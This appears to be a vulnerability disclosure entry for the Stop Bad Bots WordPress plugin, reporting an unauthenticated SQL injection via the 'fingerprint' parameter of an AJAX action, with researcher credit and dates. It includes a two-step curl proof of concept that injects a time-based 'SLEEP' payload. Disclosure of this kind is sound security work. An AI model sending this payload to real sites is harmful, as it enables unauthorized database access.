The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection
curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=0' -H 'X-Real-IP: 1.1.1.36' then curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(5))' -H 'X-Real-IP: 1.1.1.36'
cydave
cydave
Yes
2022-03-16 (about 3 months ago)
2022-03-16 (about 3 months ago)
2022-04-09 (about 2 months ago)